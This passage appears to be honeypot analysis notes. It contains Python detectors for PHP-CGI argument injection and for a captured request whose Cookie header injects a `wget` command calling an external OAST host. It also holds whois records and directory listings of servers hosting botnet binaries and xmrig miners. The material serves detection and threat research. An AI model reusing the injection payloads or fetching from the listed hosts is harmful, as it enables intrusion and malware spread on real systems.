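    path = unquote(target.partition("?")[0])
    argv = php_cgi_argv(target)
    return {
        "path": path,
        "php_cgi": bool(PHP_CGI_PATH.search(path)),
        "argv": argv,
        "findings": risky_arguments(argv),
    }


def _percent_encode_all(word: str) -> str:
    """Encode every byte, as the captured request did, so plain string matches fail."""
    return "".join(f"%{b:02X}" for b in word.encode())


# Constructed sample: the same arguments as the capture above, fully percent-encoded
# and with '=' encoded as %3D so the isindex rule still applies.
INJECTED_ARGV = [
    "-d", "allow_url_include=on", "-d", "safe_mode=off", "-d", "suhosin.simulation=on",
    "-d", 'disable_functions=""', "-d", "open_basedir=none",
    "-d", "auto_prepend_file=php://input", "-d", "cgi.force_redirect=0",
    "-d", "cgi.redirect_status_env=0", "-d", "auto_prepend_file=php://input", "-n",
]
SAMPLE_TARGET = (
    "//" + _percent_encode_all("cgi-bin") + "/" + _percent_encode_all("php")
    + "?" + "+".join(_percent_encode_all(w) for w in INJECTED_ARGV)
)

if __name__ == "__main__":
    report = analyze_request_target(SAMPLE_TARGET)
    print(report["path"], "php-cgi" if report["php_cgi"] else "other")
    for finding in report["findings"]:
        print("  ", finding)
```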

Reverse DNS:

61.237.41.193.in-addr.arpa. 86400 IN	PTR	v60340.php-friends.de.

ciio8f499hr3v1gg0ehgn3rme8stmpmc6.oast.me

POST /upload HTTP/1.1\x0d\x0aHost: ##bcable-redacted##\x0d\x0aUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\x0d\x0aConnection: close\x0d\x0aContent-Length: 1044\x0d\x0aAuthorization: QUt6NkpTeTE6dmk4cW8=\x0d\x0aContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\x0d\x0aCookie: sessionid=\x27`wget http://ciio8f499hr3v1gg0ehgn3rme8stmpmc6.oast.me`\x27\x0d\x0aAccept-Encoding: gzip\x0d\x0a\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="option"\x0d\x0a\x0d\x0a5NW9Cw1J\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="destination"\x0d\x0a\x0d\x0aJ0I5k131j2Ku\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="file.path"\x0d\x0a\x0d\x0aEKsmqqg0\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="file"; filename="config.xml"\x0d\x0aContent-Type: application/xml\x0d\x0a\x0d\x0aqJ57CM9\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="filename"\x0d\x0a\x0d\x0aJbYXJR74n.xml\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="GXbLINHYkFI"\x0d\x0a\x0d\x0a<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\x0d\x0a-----------------------------392306610282184777655655237536--\x0d\x0a

Looking at the output of the wget:

$ curl -i ciio8f499hr3v1gg0ehgn3rme8stmpmc6.oast.me
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: oast.me
X-Interactsh-Version: 1.1.5
Date: Fri, 18 Aug 2023 16:17:28 GMT
Content-Length: 72

<html><head></head><body>6cmpmts8emr3nghe0gg1v3rh994f8oiic</body></html>

Seems to be obfuscating the session id, or making a dynamic one, for the attack.
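Added example, not part of the honeypot notes: a small Python detector for the request pattern above. It decodes the honeypot's `\x0d\x0a` escaping, splits the headers, and flags shell command substitution inside a header value plus callbacks to out-of-band (OAST) domains, returning the callback hostname so its correlation id can be pivoted on in DNS logs. `oast.me` comes from the capture; `interact.sh` and `oastify.com` are assumed as other common OAST suffixes, and `CAPTURE` is a constructed, trimmed copy of the request shown above.

```python
import re

# Honeypot captures on this page render CR/LF as the literal text "\x0d\x0a";
# decode_capture() restores the raw request as a str.
def decode_capture(escaped: str) -> str:
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), escaped)

def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (request line, {header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

# Shell command substitution inside a header value (backticks or $(...)).
CMD_SUBST = re.compile(r"`[^`]+`|\$\([^)]+\)")
# Out-of-band callback domains: oast.me is the one seen in the capture above;
# interact.sh and oastify.com are assumed here as other common OAST services.
OAST_SUFFIXES = ("oast.me", "interact.sh", "oastify.com")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

def find_indicators(raw: str) -> list:
    """Return (kind, header, evidence) tuples for every suspicious header."""
    _, headers, _ = parse_request(raw)
    findings = []
    for name, value in headers.items():
        for m in CMD_SUBST.finditer(value):
            findings.append(("command-substitution", name, m.group(0)))
        for host in URL_HOST.findall(value):
            if host.endswith(OAST_SUFFIXES):
                # Leftmost label is the interactsh correlation id; pivot on it in DNS logs.
                findings.append(("oast-callback", name, host))
    return findings

# Constructed capture: a trimmed copy of the request shown above, same Cookie header.
CAPTURE = (
    "POST /upload HTTP/1.1\\x0d\\x0aHost: honeypot.example\\x0d\\x0a"
    "Cookie: sessionid=\\x27`wget http://ciio8f499hr3v1gg0ehgn3rme8stmpmc6.oast.me`\\x27\\x0d\\x0a"
    "Content-Type: multipart/form-data; boundary=---------------------------3923\\x0d\\x0a"
    "\\x0d\\x0a-----------------------------3923--\\x0d\\x0a"
)

if __name__ == "__main__":
    for kind, header, evidence in find_indicators(decode_capture(CAPTURE)):
        print(f"{kind:22} {header:12} {evidence}")
```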

114.67.217.170

inetnum:        114.67.64.0 - 114.67.255.255
netname:        JDCOM
descr:          Beijing Jingdong 360 Degree E-commerce Co., Ltd.
country:        CN
admin-c:        LY4075-AP
tech-c:         WD815-AP
abuse-c:        AC1601-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-JDCOM-CN
last-modified:  2022-01-18T08:32:37Z
source:         APNIC

irt:            IRT-JDCOM-CN
address:        Beijing city Chaoyang District Beichen road
address:        A Beichen Century Center No. 8 16 storey
e-mail:         wanglujia@jd.com
abuse-mailbox:  wanglujia@jd.com
auth:           # Filtered
admin-c:        ZY3570-AP
tech-c:         ZK326-AP
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-08-25T08:37:53Z
source:         APNIC
$ curl -i 114.67.217.170
HTTP/1.1 403 Forbidden
Date: Fri, 18 Aug 2023 23:20:33 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<title>Apache HTTP Server Test Page powered by CentOS</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
Index of /bins

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       sora.arm         2023-07-09 06:50  27K  
[   ]       sora.arm5        2023-07-09 06:50  24K  
[   ]       sora.arm6        2023-07-09 06:50  33K  
[   ]       sora.arm7        2023-07-09 06:50  52K  
[   ]       sora.i686        2023-07-09 06:50  29K  
[   ]       sora.m68k        2023-07-09 06:50  87K  
[   ]       sora.mips        2023-07-09 06:50  28K  
[   ]       sora.mpsl        2023-07-09 06:50  29K  
[   ]       sora.ppc         2023-07-09 06:50  26K  
[   ]       sora.sh4         2023-07-09 06:50  81K  
[   ]       sora.spc         2023-07-09 06:50  89K  
[   ]       sora.x86         2023-07-09 06:50  28K  
[   ]       sora.x86_64      2023-07-09 06:50  28K  
══════════════════════════════════════════════════════════════
sora.arm:    ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
sora.arm5:   ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
sora.arm6:   ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
sora.arm7:   ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
sora.i686:   ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
sora.m68k:   ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
sora.mips:   ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
sora.mpsl:   ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
sora.ppc:    ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header
sora.sh4:    ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
sora.spc:    ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
sora.x86:    ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
sora.x86_64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header

46.29.166.61

inetnum:        46.29.166.0 - 46.29.167.255
netname:        BX-NETWORK
descr:          LLC Baxet
country:        RU
admin-c:        AP12753-RIPE
tech-c:         AP12753-RIPE
status:         ASSIGNED PA
mnt-by:         BX-NOC
mnt-domains:    BX-NOC
mnt-routes:     BX-NOC
created:        2013-09-11T18:47:21Z
last-modified:  2013-10-07T18:56:43Z
source:         RIPE # Filtered

person:         Anton Pankratov
remarks:        http://justhost.ru
address:        Zelenograd, Sosnovaya alleya, 4, str 2, 33
address:        Moscow, Russia
phone:          +7 495 6680903
nic-hdl:        AP12753-RIPE
created:        2010-10-07T13:49:43Z
last-modified:  2017-10-30T22:11:13Z
source:         RIPE # Filtered
mnt-by:         BX-NOC
$ curl -i 46.29.166.61
HTTP/1.1 500 INTERNAL SERVER ERROR
Server: Werkzeug/2.3.6 Python/3.8.10
Date: Fri, 18 Aug 2023 23:19:08 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 265
Connection: close

<!doctype html>
<html lang=en>
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
arc:  ELF 32-bit LSB executable, Synopsys ARCompact ARC700 cores, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, for GNU/Linux 4.8.0, stripped
arm:  ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
i5:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
i6:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
m68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
ppc:  ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
sh:   ASCII text
sh4:  ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
spc:  ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
x86:  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

194.87.48.216

inetnum:        194.87.48.0 - 194.87.48.255
netname:        BG-NETWORK
country:        RU
org:            ORG-BGI3-RIPE
mnt-domains:    BG-MNT
mnt-routes:     BG-MNT
admin-c:        BGI13-RIPE
tech-c:         BGI13-RIPE
status:         ASSIGNED PA
mnt-by:         interlir-mnt
mnt-by:         lir-ae-rcstechnologies-1-MNT
created:        2023-04-06T14:16:25Z
last-modified:  2023-04-06T17:46:18Z
source:         RIPE

organisation:   ORG-BGI3-RIPE
org-name:       Baxet Group Inc.
country:        US
org-type:       OTHER
geoloc:         39.7456 75.5482
language:       EN
address:        2093 PHILADELPHIA PIKE, 6009
address:        Claymont, DE 19703-2424
address:        US
phone:          +1 (917) 938-7088
abuse-c:        BGI13-RIPE
mnt-ref:        MARTON-MNT
mnt-ref:        voldeta-mnt
mnt-ref:        interlir-mnt
mnt-ref:        RELCOMGROUP-EXT-MNT
mnt-by:         BG-MNT
created:        2022-01-27T10:25:14Z
last-modified:  2023-07-24T07:29:22Z
source:         RIPE # Filtered
$ curl -i http://194.87.48.216/
HTTP/1.1 403 Forbidden
Date: Fri, 18 Aug 2023 23:31:14 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<title>Apache HTTP Server Test Page powered by CentOS</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
Index of /lx

   [ICO]          Name         Last modified   Size Description
═══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                      -  
[   ]       Chaosontopxd.arm  2023-08-05 09:33  31K  
[   ]       Chaosontopxd.arm5 2023-08-05 09:33  27K  
[   ]       Chaosontopxd.arm6 2023-08-05 09:33  36K  
[   ]       Chaosontopxd.arm7 2023-08-05 09:33  56K  
[   ]       Chaosontopxd.m68k 2023-08-05 09:33 106K  
[   ]       Chaosontopxd.mips 2023-08-05 09:33  34K  
[   ]       Chaosontopxd.mpsl 2023-08-05 09:33  35K  
[   ]       Chaosontopxd.ppc  2023-08-05 09:33  32K  
[   ]       Chaosontopxd.sh4  2023-08-05 09:33  81K  
[   ]       Chaosontopxd.spc  2023-08-05 09:33  93K  
[   ]       Chaosontopxd.x86  2023-08-05 09:33  32K  
[   ]       a                 2023-08-05 09:33  32K  
[   ]       u                 2023-08-05 09:33  34K  
[   ]       x                 2023-08-05 09:33  34K  
═══════════════════════════════════════════════════════════════
Chaosontopxd.arm:  ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
Chaosontopxd.arm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
Chaosontopxd.arm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
Chaosontopxd.arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
Chaosontopxd.m68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Chaosontopxd.mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Chaosontopxd.mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Chaosontopxd.ppc:  ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header
Chaosontopxd.sh4:  ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Chaosontopxd.spc:  ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
Chaosontopxd.x86:  ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
$ md5sum u x lx/Chaosontopxd.mips
73f90642eb891e71caf93d3de2e5a5f7  u
73f90642eb891e71caf93d3de2e5a5f7  x
73f90642eb891e71caf93d3de2e5a5f7  lx/Chaosontopxd.mips

download.asyncfox.xyz

download.asyncfox.xyz.	300	IN	A	185.225.75.242
inetnum:        185.225.75.0 - 185.225.75.255
org:            ORG-DCB8-RIPE
abuse-c:        SB27731-RIPE
netname:        SERVERION_BV-NET
country:        NL
admin-c:        SB27731-RIPE
tech-c:         SB27731-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
mnt-routes:     mnt-nl-descapital-1
mnt-domains:    mnt-nl-descapital-1
mnt-lower:      mnt-nl-descapital-1
created:        2022-06-28T09:01:54Z
last-modified:  2022-09-26T14:48:18Z
source:         RIPE

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
phone:          +31851308338
phone:          +13023803902
admin-c:        AA35882-RIPE
tech-c:         TA7409-RIPE
abuse-c:        AR60082-RIPE
$ curl -i http://download.asyncfox.xyz/
HTTP/1.1 403 Forbidden
Server: nginx/1.18.0
Date: Tue, 29 Aug 2023 19:33:12 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive

<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>
$ curl -i http://download.asyncfox.xyz/download/
HTTP/1.1 403 Forbidden
Server: nginx/1.18.0
Date: Tue, 29 Aug 2023 19:32:45 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive

<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>
dupa2.sh:     Bourne-Again shell script, ASCII text executable
dupa.sh:      Bourne-Again shell script, ASCII text executable
xmrig.arm7:   ELF 32-bit LSB shared object, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header
xmrig.arm8:   ELF 64-bit LSB shared object, ARM aarch64, version 1 (SYSV), statically linked, no section header
xmrig.i686:   ELF 32-bit LSB shared object, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
xmrig.x86_64: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), statically linked, no section header

43.249.172.195:888

inetnum:        43.249.172.0 - 43.249.175.255
netname:        JUNIUYUN-CN
descr:          111 Sports West
descr:          Tianhe District
country:        HK
org:            ORG-GFBN1-AP
admin-c:        JA476-AP
tech-c:         JA476-AP
abuse-c:        AJ496-AP
status:         ALLOCATED PORTABLE
remarks:        --------------------------------------------------------
remarks:        To report network abuse, please contact mnt-irt
remarks:        For troubleshooting, please contact tech-c and admin-c
remarks:        Report invalid contact via www.apnic.net/invalidcontact
remarks:        --------------------------------------------------------
mnt-by:         APNIC-HM
mnt-lower:      MAINT-JUNIUYUN-CN
mnt-routes:     MAINT-JUNIUYUN-CN
mnt-irt:        IRT-JUNIUYUN-CN
last-modified:  2021-01-08T06:03:12Z
source:         APNIC

irt:            IRT-JUNIUYUN-CN
address:        chian guangdong guangzhou, guangzhou guangdong 510000
e-mail:         919435089@qq.com
abuse-mailbox:  919435089@qq.com
admin-c:        JA476-AP
tech-c:         JA476-AP
auth:           # Filtered
remarks:        919435089@qq.com was validated on 2023-07-18
mnt-by:         MAINT-JUNIUYUN-CN
last-modified:  2023-07-18T00:40:32Z
source:         APNIC
$ curl -i http://43.249.172.195:888
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Tue, 29 Aug 2023 19:30:45 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Tue, 11 Apr 2023 17:22:34 GMT
Connection: keep-alive
Accept-Ranges: bytes
112: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
123: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped

Interesting strings:

case $1 in
Content-Length:
POST %s HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Host: %s:%d
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: Keep-Alive
GET %s HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Host: %s:%d
Connection: Keep-Alive
GET %s HTTP/1.1
Accept: */*
Accept-Language: en
User-Agent: Wget/1.12 (linux-gnu)
Host: %s:%d
Connection: Keep-Alive